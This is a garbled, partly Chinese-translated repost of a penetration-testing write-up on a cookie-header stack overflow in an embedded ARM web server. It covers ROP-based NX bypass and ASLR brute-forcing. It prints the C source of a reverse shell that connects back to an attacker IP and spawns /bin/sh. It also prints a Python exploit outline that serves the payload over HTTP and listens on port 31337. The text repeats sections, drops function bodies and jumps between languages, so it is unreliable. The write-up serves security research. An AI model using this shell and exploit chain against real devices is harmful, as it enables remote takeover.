发表于: 2018-4-3 15:31 6250
N. B -多次尝试联系供应商,但没有成功。由于该漏洞的性质,文章中偏移量已经修改,防止漏洞利用。
注意,"password="参数是cookie头的一部分。我们看到,该代码使用strstr找到这个地方,然后把等号后面的复制(不包括“;”字符 - 这个在后面很重要)到一个固定大小的堆栈缓冲区。
This crash isn’t exactly ideal. We can see that it’s due to an invalid read attempting to load a byte from R3 which points to 0x41414141. From our analysis this was identified as occurring in a shared library and instead of looking for ways to exploit it, we turned our focus back on the vulnerable function to try and determine what was happening after the overflow.
In the next figure we see the issue; if the string copied into the buffer contains “.gif”, then the function returns immediately without further processing. The code isn’t looking for “.gif” in the password, but in the user controlled buffer for the whole request. Avoiding further processing of a overflown buffer and returning immediately is exactly what we want (loc_2f7ac simply jumps to the function epilogue).
把".gif"附加到一长串的字符串"A"后面,这给了我们一个PC = 0x41414141段错误。能可靠的控制执行的流程,我们现在可以勾勒出我们需要定位的问题,并着手开始解决,同时,开发可利用代码。
我只囊括了最重要的细节,这个二进制是一个32位的ARMEL可执行,动态链接到NX是唯一利用缓解启用(注意系统的randomize_va_space = 1,这个我们必须得处理)。因此,我们有以下问题要解决:
绕过地址空间布局随机化(randomize_va_space = 1)。
我们用“归零”保护(ret2zp)方法[ 1 ]。给构建ROP链的问题在于,ARM架构函数的参数是通过r0-r3寄存器,和英特尔x86栈不同。绕过NX在x86处理器上我们只会进行一次ret2libc攻击,由此我们存储libc的系统函数的地址在正确的偏移,然后在偏移量+4位置存储一个空的终止的字符串作为我们希望执行的命令:
这个小工具还有跳转到SP + 12的额外好处,因此我们的缓冲区应该是这样的:
```#include <sys/socket.h>
#include <sys/types.h>
#include <string.h>
#include <stdio.h>
#include <netinet/in.h>
int main(int argc, char **argv)
Take the ARM_REV_SHELL code and modify it with
the given ip and port to connect back to.
This function then compiles the code into an
ARM binary.
@Param comp_path – This should be the path of the cross-compiler.
@Param my_ip – The IP address of the system running this code.
def compile_shell(comp_path, my_ip):
This function uses the SimpleHTTPServer module to create
a http server that will serve our malicious binary.
This function is called as a thread, as a daemon process.
def start_http_server():
This function creates a listening socket on port
REV_PORT. When a connection is accepted it updates
the global DONE flag to indicate successful exploitation.
It then jumps into a loop whereby the user can send remote
commands to the device, interacting with a spawned /bin/sh
def threaded_listener():
This function presents the actual vulnerability exploited.
The Cookie header has a password field that is vulnerable to
a sscanf buffer overflow, we make use of 2 ROP gadgets to
bypass DEP/NX, and can brute force ASLR due to a watchdog
process restarting any processes that crash.
This function will continually make malicious requests to the
devices web interface until the DONE flag is set to True.
@Param host – the ip address of the target.
@Param port – the port the webserver is running on.
@Param my_ip – The ip address of the attacking system.
def exploit(host, port, my_ip):
Finally, we put all of this together by spawning the individual threads, as well as getting command line options as usual:
def main():
if name == ‘main’:
#!/usr/bin/env python
import urllib2
import struct
import time
import socket
from optparse import *
import SimpleHTTPServer
import SocketServer
import threading
import sys
import os
import subprocess
“#include <sys/socket.h>\n”
“#include <sys/types.h>\n”
“#include <string.h>\n”
“#include <stdio.h>\n”
“#include <netinet/in.h>\n”
“int main(int argc, char **argv)\n”
” struct sockaddr_in addr;\n”
” socklen_t addrlen;\n”
” int sock = socket(AF_INET, SOCK_STREAM, 0);\n”
” memset(&addr, 0x00, sizeof(addr));\n”
” addr.sin_family = AF_INET;\n”
” addr.sin_port = htons(%d);\n”
” addr.sin_addr.s_addr = inet_addr(\”%s\”);\n”
” int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n”
” dup2(sock, 0);\n”
” dup2(sock, 1);\n”
” dup2(sock, 2);\n”
” system(\”/bin/sh\”);\n”
REV_PORT = 31337
DONE = False
This function creates a listening socket on port
REV_PORT. When a connection is accepted it updates
the global DONE flag to indicate successful exploitation.
It then jumps into a loop whereby the user can send remote
commands to the device, interacting with a spawned /bin/sh
def threaded_listener():
Take the ARM_REV_SHELL code and modify it with
the given ip and port to connect back to.
This function then compiles the code into an
ARM binary.
@Param comp_path – This should be the path of the cross-compiler.
@Param my_ip – The IP address of the system running this code.
def compile_shell(comp_path, my_ip):
This function uses the SimpleHTTPServer module to create
a http server that will serve our malicious binary.
This function is called as a thread, as a daemon process.
def start_http_server():
This function presents the actual vulnerability exploited.
The Cookie header has a password field that is vulnerable to
a sscanf buffer overflow, we make use of 2 ROP gadgets to
bypass DEP/NX, and can brute force ASLR due to a watchdog
process restarting any processes that crash.
This function will continually make malicious requests to the
devices web interface until the DONE flag is set to True.
@Param host – the ip address of the target.
@Param port – the port the webserver is running on.
@Param my_ip – The ip address of the attacking system.
def exploit(host, port, my_ip):
def main():
if name == ‘main’:
Tim Carrington – @_invictus – as part of Fidus’ Penetration Testing & Research team.